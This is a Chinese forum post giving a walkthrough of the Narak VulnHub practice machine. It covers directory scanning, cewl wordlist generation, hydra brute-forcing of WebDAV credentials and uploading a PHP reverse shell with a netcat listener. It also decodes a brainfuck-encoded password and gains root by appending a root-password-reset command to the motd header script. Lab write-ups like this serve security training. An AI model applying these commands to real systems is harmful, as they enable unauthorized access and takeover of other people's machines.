narak靶机

打印 上一主题 下一主题

主题 1242|帖子 1242|积分 3726

narak靶机
vulnhub下载靶机和kali一起设置为nat模式
ifconfig查询本机IP地址
nmap扫描本机网段查看靶机地址

 
 
查看源代码后什么也没发现
使用dirb工具-基于字典的目录扫描工具
dirb扫一下目录
使用方法:dirb http://192.168.10.138/

 
 
发现webdav服务
我们搜索webdav服务
WebDAV 基于 HTTP 协议的通信协议,在GET、POST、HEAD等几个HTTP标准方法以外添加了一些新的方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)及解锁(Unlock),还可以支持文件的版本控制。
常用的文件共享有三种:FTP、Samba、WebDAV,它们各有优缺点,了解后才能更好地根据自己的需求选择方案。
那此时我们通过webdav进入网站发现需要用户密码

 
 
因为没有任何提示我们用户密码的东西,所有我们采用密码爆破的方式,使用kali自带的字典生成工具cewl获取网站后台数据从而生成字典。
使用方法 cewl http://192.168.10.138 -w dict.txt
#dict.txt是生成文件的名字。
之后用hydra工具使用字典爆破靶机
(-L 指定用户名 -P 指定密码 http-get 请求方式)

 
 
爆破出密码用户后登录

 
 
我们上传一个shell文件
反弹shell端口号和ip地址改成本机的


 
 
用cadaver工具连接webdav以便上传我们的shell文件

 
 
进入webdav后我们打开:
open http://192.168.10.138/webdav
我们要把shell文件放在网站根目录下后再put webshell.php

 
 

 
 
之后nc -lvvp 4444监听4444端口查看监听情况

 
 
在根目录下发现可疑mnt目录打开获得一串字符
--[----->+---.+++++.+.+++++++++++.--.+++[->+++++.++++++.--[--->+--.-----.++++.
解码网站:https://www.splitbrain.org/services/ook
得到一组brainfuck编码,解码后得到:
chitragupt
在home目录下发现了 inferno,narak用户

 
 
ssh连接登录inferno试试,解码的chitragupt作为密码登录找到user.txt文件发现flag

 
 

 
 
修改文件 /etc/update-motd.d/00-header1.进入到文件夹 /etc/update-motd.d/2.修改文件 echo "echo 'root:admin'|sudo chpasswd">>00-header3.重新登录\4. 切换管理员

 
 
之后 su root切换管理员权限时,密码就是admin

 
 
root目录中找到flag

 
 
 
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

0 个回复

倒序浏览

快速回复

您需要登录后才可以回帖 登录 or 立即注册

本版积分规则

魏晓东

论坛元老
这个人很懒什么都没写!
快速回复 返回顶部 返回列表